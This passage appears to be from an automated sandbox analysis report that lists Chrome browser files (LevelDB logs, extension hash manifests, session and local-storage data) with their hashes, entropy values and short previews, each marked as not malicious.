SHA-512:	130B86B1962D5721B713F83DE6D5EC8385AE788AC62C9940BD02EA6F6FB9B2CFB9C36FAAD201006D2127CE05AB6D00FB1A81081DF63ED5BE87C5CC92ED4E20C1
Malicious:	false
Preview:	2021/12/06-19:09:27.211 197c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/12/06-19:09:27.214 197c Recovering log #3.2021/12/06-19:09:27.215 197c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old~ (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.215192451506192
Encrypted:	false
SSDEEP:	6:mBPLL+q2PWXp+N23iKKdK8aPrqIFUtAPLAXZmw2PL3VkwOWXp+N23iKKdK8amLJ:uPLL+va5KkL3FUtAPLM/2PL3V5f5KkQJ
MD5:	6B7452B3B276A6655A97C872AD26F22D
SHA1:	AD94E19C0BD9DEF2D279733C0DF3C3E7B3FF2D77
SHA-256:	EAE991041C4D0F1FE08E971BEA4C68D2C89F7F42DD1F0F3DFA4DE136FCE38963
SHA-512:	130B86B1962D5721B713F83DE6D5EC8385AE788AC62C9940BD02EA6F6FB9B2CFB9C36FAAD201006D2127CE05AB6D00FB1A81081DF63ED5BE87C5CC92ED4E20C1
Malicious:	false
Preview:	2021/12/06-19:09:27.211 197c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/12/06-19:09:27.214 197c Recovering log #3.2021/12/06-19:09:27.215 197c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW7:
MD5:	763F7DC0C355624843438D92927ACD06
SHA1:	E6DF45862B8D4F2DD538BEAD4A0288EACAB3AED6
SHA-256:	B2394571D88A272B80731B23A88DB6D0490A241D4A0958C2C468C42ECF6E5DC1
SHA-512:	58A9E61B4E6304AA2030B0335B93EA0522F68C528AE34E3101E566CF9453CDB767CCB005A003BCD3D0248B6836BE37752692AEF0C443DC416E91D26BF8FC866A
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.247719978154301
Encrypted:	false
SSDEEP:	6:mBPd97zdFN+q2PWXp+N23iKKdK8NIFUtAPd9bEH5Zmw2Pd9QNVkwOWXp+N23iKKb:uPJOva5KkpFUtAPa/2Psz5f5KkqJ
MD5:	392F885F46073CF6427CBEB94A10C478
SHA1:	D1575497B8882E0D60E96BF5261A3E07F8FDB19F
SHA-256:	0762F8C6C95AD9E320319CF17F5FA47FBD80F16233E3CF1CB62C9892DDE4540A
SHA-512:	4423E92A965A7582C5EDE5B8EFED99F3B93535EF7B917D01F783BF81A398CDDD173DEAC41262AF9A60BB1675E8C60C44425924E951EE3E6FB06079D101BC1DC3
Malicious:	false
Preview:	2021/12/06-19:08:51.666 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/12/06-19:08:51.667 1ab8 Recovering log #3.2021/12/06-19:08:51.669 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old~ (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.247719978154301
Encrypted:	false
SSDEEP:	6:mBPd97zdFN+q2PWXp+N23iKKdK8NIFUtAPd9bEH5Zmw2Pd9QNVkwOWXp+N23iKKb:uPJOva5KkpFUtAPa/2Psz5f5KkqJ
MD5:	392F885F46073CF6427CBEB94A10C478
SHA1:	D1575497B8882E0D60E96BF5261A3E07F8FDB19F
SHA-256:	0762F8C6C95AD9E320319CF17F5FA47FBD80F16233E3CF1CB62C9892DDE4540A
SHA-512:	4423E92A965A7582C5EDE5B8EFED99F3B93535EF7B917D01F783BF81A398CDDD173DEAC41262AF9A60BB1675E8C60C44425924E951EE3E6FB06079D101BC1DC3
Malicious:	false
Preview:	2021/12/06-19:08:51.666 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/12/06-19:08:51.667 1ab8 Recovering log #3.2021/12/06-19:08:51.669 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	11217
Entropy (8bit):	6.069602775336632
Encrypted:	false
SSDEEP:	192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
MD5:	90F880064A42B29CCFF51FE5425BF1A3
SHA1:	6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
SHA-256:	965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
SHA-512:	D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_1\_metadata\computed_hashes.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	23474
Entropy (8bit):	6.059847580419268
Encrypted:	false
SSDEEP:	384:7dNc1NC6IcafusK4H1IIGRlhKlkIALQWdynQh2RX4K6M1tVztzr7XSNyzH:7dOscSRKc1nGRSkIhEw6M1tf7SNyb
MD5:	6AE2135EA4583C2F06CDEBEA4AE70FA4
SHA1:	DCEB26C7F02D53B5F214305F4C75B4A33A79CDC2
SHA-256:	03AA1944CB3C4F39E20B6361571BC45DFBEBD3FFDA3D8F148CC6ECB29958F903
SHA-512:	B5945E67D9F73DD1982D687E5C6D9B5D6B3886C8050363A259755C76AC0F93651F3425FA7C21AA6A13977AC1C8C9322F998F131648CB8909096058D4F0D23312
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["DOZdV3jFvk12AM2JNDYKo3KZrIVRprmJ+sVGWkqqE4Q=","rVElW3Hu3T52SzDDUqGT5YiJTBGUv2h3pNuBKFlhZ1U=","X/3fg4KZxgQ1jBr5QGq0F5JnflgE27UErd88mrxTcxs=","VibLbpy0ig+5INMOU71fTYN76iaka2XVpmm1qAKYsX8=","EChCwCbQHbHQ7oDdGT2qNyiRJ0yck2YC2emNGq4whtE="],"block_size":4096,"path":"_locales/iw/messages.json"},{"block_hashes":["xklkoZ7iSU1+7cd6DAtEmUC5lPFd+EgcbnzxkOiFwlk=","3KbsvoxKY/3AwqgF2aAdVQRpMhsNVRkQ3rx2A6Z2Z+Y=","o9+tsohquaCMj+70zeinRG/hBhA2uLoDl/WoC1uokME=","xV/K8xucyWJELVT8Cqn+ugFjobBVmg8pnmACF+2PP4Y=","p/mvJm2wuCl32Rx3it654MljKAsMe3S9IDEabc1A8mE=","j8mPrTb5oOsBTj2Fer78JE6xG6+kR64Cvu2SW8d3j/k=","nqSRpGQ3USU2bZJsZ+AzBmFOyann8omwJrhEWFZDTXc=","eTcQyJUuNuF9yCga/fXGyFCj/pysSceanhBzksdx23s=","Wj7faqnspelXKMvnduxHn1XUBG8TEOqyns7/oUihekM=","VtBwXoadI3EP336rAiL33Gz19KGqtN+RYdKnMKAXoLw=","iDgLXQqXJp8nCZxgLuC9LXM45DGfufvGnXvmHsn18wc=","g+RfdDfrWTUK0Pkcsbot7NJ4SC9wVRV/dVVMuHAtEj8=","2oC4HcCuXu3VjFf6wnKlznt9uqQNaebcuWpm/mWj69U=","aMUIpuFqPMiieSaWhIktCK62v2P3OZQAWupWsYzCnvk=","L

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlX:qTCT
MD5:	51A2CBB807F5085530DEC18E45CB8569
SHA1:	7AD88CD3DE5844C7FC269C4500228A630016AB5B
SHA-256:	1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
SHA-512:	B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
Malicious:	false
Preview:	.f.5................f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	372
Entropy (8bit):	5.278790223863936
Encrypted:	false
SSDEEP:	6:mBPdxyL+q2PWXp+N23iKKdK25+Xqx8chI+IFUtAPdxQl1Zmw2PdxdLVkwOWXp+Nl:uPnva5KkTXfchI3FUtAPo1/2Pr5f5KkI
MD5:	B54B937C50BAA3C3F0D6FECA257DF8FA
SHA1:	E71DFF032FCB61F0D7AC53AA990E6C7E8DEC81F3
SHA-256:	6F6A8965BB4C86585876A9B71A222DCBCB03F17A22679E1BF86B4188D7CDB5F3
SHA-512:	CE7FE08D9B224F01B49D66D4AC68A48D36846E888BD4CC985C0E05EC7DAC0C2B7015FD03D3E57E3FB59C09B50C02420F2012D0A8707DC9065F6E994EC15B54B1
Malicious:	false
Preview:	2021/12/06-19:08:55.044 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/12/06-19:08:55.048 15e8 Recovering log #3.2021/12/06-19:08:55.049 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	372
Entropy (8bit):	5.278790223863936
Encrypted:	false
SSDEEP:	6:mBPdxyL+q2PWXp+N23iKKdK25+Xqx8chI+IFUtAPdxQl1Zmw2PdxdLVkwOWXp+Nl:uPnva5KkTXfchI3FUtAPo1/2Pr5f5KkI
MD5:	B54B937C50BAA3C3F0D6FECA257DF8FA
SHA1:	E71DFF032FCB61F0D7AC53AA990E6C7E8DEC81F3
SHA-256:	6F6A8965BB4C86585876A9B71A222DCBCB03F17A22679E1BF86B4188D7CDB5F3
SHA-512:	CE7FE08D9B224F01B49D66D4AC68A48D36846E888BD4CC985C0E05EC7DAC0C2B7015FD03D3E57E3FB59C09B50C02420F2012D0A8707DC9065F6E994EC15B54B1
Malicious:	false
Preview:	2021/12/06-19:08:55.044 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/12/06-19:08:55.048 15e8 Recovering log #3.2021/12/06-19:08:55.049 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.220639360686124
Encrypted:	false
SSDEEP:	6:mBPdxpL+q2PWXp+N23iKKdK25+XuoIFUtAPdxKz1Zmw2PdxKlLVkwOWXp+N23iKX:uP8va5KkTXYFUtAP6z1/2P6z5f5KkTXp
MD5:	44177B55DC0D6CBC393B34182178F7E0
SHA1:	81B4FF83B6186B08A69065F4B2FA5A414F153D9D
SHA-256:	FCC95C7E77CA63E0A1AAFAD62A1BA1BB2A6A41E723DD2B8829F00ACAC68EFC44
SHA-512:	0A3CB344D2E3A93FD58522700F6164DF6337FFF4F38E80BE7B8245564FADAF100BBD5EC9C72E45276B4FF0D2ED17CA92D9C839B88A88B90BD3C2ED1FC9339E7C
Malicious:	false
Preview:	2021/12/06-19:08:55.038 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/12/06-19:08:55.040 15e8 Recovering log #3.2021/12/06-19:08:55.040 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.220639360686124
Encrypted:	false
SSDEEP:	6:mBPdxpL+q2PWXp+N23iKKdK25+XuoIFUtAPdxKz1Zmw2PdxKlLVkwOWXp+N23iKX:uP8va5KkTXYFUtAP6z1/2P6z5f5KkTXp
MD5:	44177B55DC0D6CBC393B34182178F7E0
SHA1:	81B4FF83B6186B08A69065F4B2FA5A414F153D9D
SHA-256:	FCC95C7E77CA63E0A1AAFAD62A1BA1BB2A6A41E723DD2B8829F00ACAC68EFC44
SHA-512:	0A3CB344D2E3A93FD58522700F6164DF6337FFF4F38E80BE7B8245564FADAF100BBD5EC9C72E45276B4FF0D2ED17CA92D9C839B88A88B90BD3C2ED1FC9339E7C
Malicious:	false
Preview:	2021/12/06-19:08:55.038 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/12/06-19:08:55.040 15e8 Recovering log #3.2021/12/06-19:08:55.040 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.2967585925983025
Encrypted:	false
SSDEEP:	6:mBPdXL+q2PWXp+N23iKKdKWT5g1IdqIFUtAPd1fi1Zmw2Pd1f0LVkwOWXp+N23im:uPMva5Kkg5gSRFUtAPji1/2Pj05f5Kkn
MD5:	02005E285515C0489DFB5E16253B9ED7
SHA1:	57B590BF333228C7DE5029B5417D6DE5D7FB511A
SHA-256:	31DD442C175B410A2A55058D66DB1E91A4D4500B3A523EAFC4B7C02E81309771
SHA-512:	07A52F7E522558F13B6BA25781981AC7DC47EF5906179CABA9C19B686FC86BDC081C2EC8645D98F2766EE8C9319876C4F9A67038BF026DB08B429FC83FF1A83E
Malicious:	false
Preview:	2021/12/06-19:08:54.963 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/12/06-19:08:54.964 15e8 Recovering log #3.2021/12/06-19:08:54.964 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.2967585925983025
Encrypted:	false
SSDEEP:	6:mBPdXL+q2PWXp+N23iKKdKWT5g1IdqIFUtAPd1fi1Zmw2Pd1f0LVkwOWXp+N23im:uPMva5Kkg5gSRFUtAPji1/2Pj05f5Kkn
MD5:	02005E285515C0489DFB5E16253B9ED7
SHA1:	57B590BF333228C7DE5029B5417D6DE5D7FB511A
SHA-256:	31DD442C175B410A2A55058D66DB1E91A4D4500B3A523EAFC4B7C02E81309771
SHA-512:	07A52F7E522558F13B6BA25781981AC7DC47EF5906179CABA9C19B686FC86BDC081C2EC8645D98F2766EE8C9319876C4F9A67038BF026DB08B429FC83FF1A83E
Malicious:	false
Preview:	2021/12/06-19:08:54.963 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/12/06-19:08:54.964 15e8 Recovering log #3.2021/12/06-19:08:54.964 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.32682373748494775
Encrypted:	false
SSDEEP:	6:BlS4/fMt76Y4QZVRtRex99pG/QaqR4EZY4QZv8fOv:TS4nMWQA9LbhBQZ8fOv
MD5:	535B426ACCF53CB052ECF8299EFBF532
SHA1:	1E0D5E9BE4203855D9CABB83D8E483D5FAA3E0D6
SHA-256:	B7731E8176FB064B63ED8F40B9CD454AA843AE7E3563F008C2806D4E5A607CC2
SHA-512:	E5A7B23D89328F5AFE6B9341FD9B4EB84AC0B5ED18194C33044B1CCDDCD8B9370E5D723B2DCF5EEA7B8D00E037E936D130984DE3FE5A66AED77A86C144ACFE92
Malicious:	false
Preview:	............o..<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	5482
Entropy (8bit):	2.9703518002147495
Encrypted:	false
SSDEEP:	48:34p6xx//9917LoubIykxQumzoP7o9LU8hIGiV5hSPFkqfdXg9On2DPwiV59/O:34mxqyIrm8Do9Ri9wdqwipO
MD5:	9FD08E874DEA6845F3D76244735F86C9
SHA1:	68B6AC5F1767E134DF4014BA8C2547506E4D25C2
SHA-256:	2A83D7C2575EEDC064774B60DF94DC5C42236EA2F21E5FC2056F31C620CA0D59
SHA-512:	13C7A27DE7A045147FDDA599EFD17608B188D3AEB2B15F12048829F89092FC82812457A02881F69F1B8F4B0E302F7CDBB1C0421A341FC0F84B9DD02A71E0C314
Malicious:	false
Preview:	SNSS....................................................!.............................................1..,.......$...1293eea3_790b_46cf_8155_cb4a6f58db13......................r.......................................................................................................................................................................chrome://newtab/....N.e.w. .T.a.b...................................................h.......`.......................................................[.F.....\.F.............................................X...(...c.h.r.o.m.e.-.s.e.a.r.c.h.:././.l.o.c.a.l.-.n.t.p./.l.o.c.a.l.-.n.t.p...h.t.m.l.................................8.......0.......8....................................................................... ............................... ...............................h.......`.......................................................].F.....^.F.....................................................a.b.o.u.t.:.b.l.a.n.k...................H... ...<.!.-

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Tabsta (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	1.8112781244591325
Encrypted:	false
SSDEEP:	3:3Dtn:3h
MD5:	0686D6159557E1162D04C44240103333
SHA1:	053E9DB58E20A67D1E158E407094359BF61D0639
SHA-256:	3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
SHA-512:	884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
Malicious:	false
Preview:	SNSS....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	modified
Size (bytes):	7826
Entropy (8bit):	5.389019395935603
Encrypted:	false
SSDEEP:	192:oIXgdczDpE5fgnwKHgQAy1gdrrVxZE5fgHv:bsowsyHhv
MD5:	991CD280C841363E0454E68B730C6913
SHA1:	94BF6D6872A0EAC64F16B4F47C15E774BFCB0E65
SHA-256:	7399C0FED9F726F61A59C68C730D02BB117A3D30EBF6C3240B2BD785049ADA41
SHA-512:	8CC0F64F1C82A0DF859C5C94B49363EAB19383C9784044F7CF39667EDFADE846175915FAD72D97667428C0F853215792EDF095653F7755F06A4D81CEC66BDB4C
Malicious:	false
Preview:	...5.................VERSION.1.8META:chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..............Q_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.CloudProvider7.{"cloudEnabled":false,"notifiedHangoutsPrivacy":false}.S_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.IdentityService6.{"signedIn":false,"userEmail":null,"kioskAuth":false}.Y_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.HangoutSinkDiscoveryService;.{"cache":{"sinks":{},"g":{},"h":null},"manualHangouts":{}}.a_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.IdGenerator.cast.RequestIdGenerator..826992000.H_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.LogManager...["[2020-09-30 07:58:17.19][INFO][mr.Init] MR instance ID: eed8a5c4-c410-41ec-8296-fe0906655421\n","[2020-09-30 07:58:17.20][INFO][mr.Init] Native Cast MRP is disabled.\n","[2020-09-30 07:58:17.20][INFO][mr.Init] Native Mirroring Service is enabled.\n","[2020-09-30 07:58:17.21][INFO

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.222232710788838
Encrypted:	false
SSDEEP:	6:mBPdTROq2PWXp+N23iKKdK8a2jMGIFUtAPdInFZZmw2PdKMkwOWXp+N23iKKdK8N:uPxROva5Kk8EFUtAP+nX/2PsM5f5Kk8N
MD5:	483830EFC5BF35842A6F6052E8EAAA67
SHA1:	A08D19EA43F4B49C7ED9D4B2B414EE55CBB6B826
SHA-256:	E22065F1D38FA56FB80B95550A819619350FD77305D85FF29DB080B68F73A91A
SHA-512:	5DAE785B03E62A8728AB79A1A37FF12C46C50369FE886162A179DEDD8550ADF20065C7EE784CDCFA99A94F750C7A4C17D085422578F19798E6DE6100D79E3848
Malicious:	false
Preview:	2021/12/06-19:08:49.439 1a94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.447 1a94 Recovering log #3.2021/12/06-19:08:49.453 1a94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.222232710788838
Encrypted:	false
SSDEEP:	6:mBPdTROq2PWXp+N23iKKdK8a2jMGIFUtAPdInFZZmw2PdKMkwOWXp+N23iKKdK8N:uPxROva5Kk8EFUtAP+nX/2PsM5f5Kk8N
MD5:	483830EFC5BF35842A6F6052E8EAAA67
SHA1:	A08D19EA43F4B49C7ED9D4B2B414EE55CBB6B826
SHA-256:	E22065F1D38FA56FB80B95550A819619350FD77305D85FF29DB080B68F73A91A
SHA-512:	5DAE785B03E62A8728AB79A1A37FF12C46C50369FE886162A179DEDD8550ADF20065C7EE784CDCFA99A94F750C7A4C17D085422578F19798E6DE6100D79E3848
Malicious:	false
Preview:	2021/12/06-19:08:49.439 1a94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.447 1a94 Recovering log #3.2021/12/06-19:08:49.453 1a94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2083
Entropy (8bit):	4.900523861620045
Encrypted:	false
SSDEEP:	48:Y2TtwCXGDH3qz5sL9KGs0RLsUSsBvrqXsEMH7snMHjDYhbD:JTOCXGDHazi9K2LjrGGeGwhH
MD5:	71C6DA154986CFFE2027ACFF96928DA5
SHA1:	F2CB74BCA5322D39CE745289F58D90D5D008BD4E
SHA-256:	19F4F3040934E9EA944D006288ED046973A414B754D270479BBB12FB0B0BD831
SHA-512:	6DDBBC8EC02DCF16EA8E37A0E40FE5A6A2103153BA1123ED96ABB01BF59C6FFBDE4BF0BFD54095E33B710DCA47557BC2ADB27C8EE475C0BA155B22CC33A8B7C9
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131531273","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131555730","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State43 (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4219
Entropy (8bit):	4.871684703914691
Encrypted:	false
SSDEEP:	48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
MD5:	EDC4A4E22003A711AEF67FAED28DB603
SHA1:	977E551B9ED5F60D018C030B0B4AA2E33B954556
